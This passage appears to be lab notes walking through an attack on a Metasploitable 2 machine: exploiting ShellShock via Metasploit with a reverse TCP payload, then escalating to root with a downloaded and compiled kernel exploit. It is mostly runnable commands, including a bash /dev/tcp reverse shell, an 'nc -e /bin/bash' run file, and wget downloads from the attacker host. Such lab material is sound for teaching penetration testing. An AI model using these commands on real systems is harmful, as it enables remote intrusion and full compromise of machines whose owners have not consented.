bash -i >& /dev/tcp/192.168.56.103/4444 0>&1
```

## Hacking I - ShellShock (unprivileged permissions)

### Todo 1: Prepare the target (metasploitable 2)

```
## metasploitable 2 should be up and running

## Step 1:
## als root: sudo su
## password: msfadmin
cd /usr/lib/cgi-bin
vi hello.sh
## --> content (! /bin/bash will be the first line

##! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"

## Step 2 (permissions)
chmod 755 hello.sh

## Step 3 (test in browser of machine that can reach you metasploitable2 machine
http://192.168.10.x/cgi-bin/hello.sh
```

### Todo 2: Proceed on kali

```
## Connect through ssh or use desktop -> terminal as root
msfconsole
msf>search shellshock
msf>use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf.....>options

## We need to set the path and the ip of the target (metaploitable 2) here.
msf.....>set rhost 192.168.10.198
msf.....>set targeturi /cgi-bin/hello.sh
targeturi => /cgi-bin/hello.sh

## Now we need to decide for a payload
msf.....>show payloads
msf.....>set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp

## let again check the options
msf.....>options

## IMPORTANT: If you have 2 network interfaces, you need to set the right one
msf.....>set lhost 192.168.10.169

## now let's try if it would work
msf.....>check

## now let's exploit
msf.....>exploit
```



```
## Try to get some info now  
whoami  
  
## Yes, we are successful
```

**Ref: (normal privileges)**

- <https://null-byte.wonderhowto.com/how-to/exploit-shellshock-web-server-using-metasploit-0186084/>

## Hacking II - privilege escalation

### Prerequisites

- You need to have a reverse shell open (e.g. Hacking I - Session)

### Walkthrough

```
## STEP 1: Reverse shell (connected to target)
## In Reverse shell find out the kernel version
uname -a
lsb_release -a

## STEP 2: On kali
## Open 2nd kali terminal and search exploits
searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6

## find out source code c
less /usr/share/exploitdb/exploits/linux/local/8572.c

## Start apache server
systemctl start apache2

## Symbolic link to all the exploits
ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/

## Create a run file we will need later
vi /var/www/html/run
## ip will be the ip of our kali-server

##!/bin/bash
nc 192.168.10.169 12345 -e /bin/bash

## STEP 3: Reverse shell (connected to target)
## Download the files
cd /tmp
wget http://192.168.10.169/run
wget http://192.168.10.169/local/8572.c
## compiling exploit in reverse shell
gcc -o exploit 8572.c
ls -l

## Finding the pid
cat /proc/net/netlink
ps aux | grep udev

## STEP 4:
## on Kali start a listener
nc -lvp 12345

## STEP 5:
## Back on reverse shell start the exploit
## with the pid you got e.g. 2748 (that from cat /proc/net/netlink)
./exploit 2748
```

```
## STEP 6:  
## Go back to kali and in your listener enter  
whoami
```

**Ref: (root privileges)**

- <https://samsclass.info/124/proj14/p18xLPE.htm>

**Documentation**